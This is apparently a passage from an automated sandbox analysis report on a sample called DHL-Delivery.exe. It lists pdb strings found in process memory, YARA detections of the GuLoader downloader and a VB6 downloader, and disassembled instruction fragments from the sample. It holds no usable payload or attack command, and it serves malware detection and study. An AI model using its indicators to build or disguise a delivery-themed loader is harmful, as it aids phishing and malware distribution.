    Source: Binary string: cscui.pdbU source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000F.00000003.2668877102.00000243B7804000.00000004.00000001.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: sspicli.pdb+ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: avrt.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: IEProxy.pdb' source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: igc64.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: samlib.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdbJ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: OneDriveSettingSyncProvider.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: msctf.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: mscms.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.2744697687.000000000FC00000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp, explorer.exe, 00000012.00000002.3681120064.0000000007280000.00000002.00000001.sdmp
    Source: Binary string: user32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdbr source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: UserMgrProxy.pdbg source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.UI.Shell.pdba source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: ColorAdapterClient.pdbA source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: MSWB7.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: dusmapi.pdb+ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ApplicationFrame.pdbu source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: winsta.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: linkinfo.pdbl source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: WpnClient.pdb- source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: userenv.pdb. source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: stobject.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000F.00000003.2668877102.00000243B7804000.00000004.00000001.sdmp
    Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: vaultcli.pdb< source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: audioses.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: ntshrui.pdb5 source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: MSWB7.pdb@ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ninput.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000F.00000003.2668877102.00000243B7804000.00000004.00000001.sdmp
    Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cmmon32.pdbGCTL source: DHL-Delivery.exe, 00000006.00000003.2175308840.00000000007B5000.00000004.00000001.sdmp
    Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: N.pdb source: WerFault.exe, 0000000F.00000003.2680424739.00000243B480A000.00000004.00000001.sdmp
    Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000F.00000003.2579133161.00000243B65D2000.00000004.00000001.sdmp
    Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: sxs.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000F.00000003.2669811212.00000243B7821000.00000004.00000001.sdmp
    Source: Binary string: win32u.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000F.00000003.2594052462.00000243B65CC000.00000004.00000001.sdmp
    Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: imm32.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: igd10iumd64.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: cdp.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: coml2.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.Devices.Enumeration.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: drprov.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wntdll.pdbUGP source: DHL-Delivery.exe, 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000002.3602197613.0000000004C60000.00000040.00000001.sdmp
    Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: pdh.pdbe source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cscapi.pdbi source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdbE source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb: source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: cscui.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdbJ source: WerFault.exe, 0000000F.00000003.2667329598.00000243B7907000.00000004.00000001.sdmp
    Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.UI.Core.TextInput.pdbU source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ExplorerFrame.pdbI source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ncrypt.pdb@ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: netutils.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000F.00000003.2579133161.00000243B65D2000.00000004.00000001.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cmmon32.pdb source: DHL-Delivery.exe, 00000006.00000003.2175308840.00000000007B5000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdbZ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb8 source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cflapi.pdbq source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: ActionCenter.pdbe source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: DXP.pdb\ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: explorer.pdb source: WerFault.exe, 0000000F.00000003.2671229830.00000243B78F0000.00000004.00000040.sdmp
    Source: Binary string: twinui.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: DataExchange.pdbq source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WscApi.pdb9 source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: usermgrcli.pdbN source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: TaskFlowDataEngine.pdb] source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: userenv.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WPDShServiceObj.pdb+ source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: atlthunk.pdbS source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Wer.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wscinterop.pdb. source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdbx source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: devobj.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: LanguageOverlayUtil.pdbY source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: WorkFoldersShell.pdbs source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: twinui.pdbt source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: Windows.StateRepository.pdb} source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: EhStorShell.pdbY source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ES.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: HolographicExtensions.pdbM source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: pdh.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: AboveLockAppHost.pdbQ source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.Media.Devices.pdbk source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: DXP.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000F.00000003.2594052462.00000243B65CC000.00000004.00000001.sdmp
    Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: PortableDeviceTypes.pdbJ source: WerFault.exe, 0000000F.00000003.2667329598.00000243B7907000.00000004.00000001.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: PortableDeviceTypes.pdbL source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000F.00000003.2668877102.00000243B7804000.00000004.00000001.sdmp
    Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wpdshext.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: Process Memory Space: DHL-Delivery.exe PID: 892, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: DHL-Delivery.exe PID: 5880, type: MEMORY
    Yara detected VB6 Downloader GenericShow sources
    Source: Yara matchFile source: Process Memory Space: DHL-Delivery.exe PID: 892, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: DHL-Delivery.exe PID: 5880, type: MEMORY
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_00406052 push esi; retf 0_2_0040608A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_00404C55 push esp; retf 0_2_00404C56
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_00406C72 push esi; ret 0_2_00406D46
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_00406C10 push esi; ret 0_2_00406D46
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_004062D9 push ds; ret 0_2_004062DB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_00406BEB push edx; retf 0_2_00406BEC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_00406FA3 push ebx; retf 0_2_00406FA6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAA6D push ecx; ret 0_2_021AAA75
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A6CB2 push edi; iretd 0_2_021A6CBF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1083AD push ecx; mov dword ptr [esp], ecx6_2_1E1083B6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1343C9 push ecx; ret 6_2_1E1343DC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056605B push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00566005 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00566035 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005660EF push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056608E push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005660B6 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00566179 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00566131 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005661C7 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00566226 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056629E push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005652B3 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005652A0 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005654D9 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005654FB push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00565498 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_005654B4 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00565549 push es; retf 6_2_00566A93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00565522 push es; retf 6_2_00566A93
